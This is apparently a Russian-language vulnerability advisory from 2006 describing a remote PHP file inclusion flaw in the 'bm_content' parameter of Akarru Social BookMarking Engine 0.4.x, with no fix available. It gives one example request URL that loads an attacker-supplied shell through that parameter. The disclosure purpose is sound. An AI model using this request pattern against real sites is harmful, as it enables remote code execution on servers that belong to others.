PHP-инклюдинг в Akarru Social BookMarking Engine

Дата публикации:
08.09.2006
Всего просмотров:
3873
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Akarru Social BookMarking Engine 0.x
Уязвимые версии: Akarru Social BookMarking Engine 0.4.4.120 и 0.4.3.34, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "bm_content" в сценарии akarru.gui/main_content.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[host]/[path]/akarru.gui/main_content.php?bm_content=[shell]

URL производителя: sourceforge.net/projects/akarru/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Akarru <= 0.4.3.34 (bm_content) Remote File Include Vulnerability

или введите имя

CAPTCHA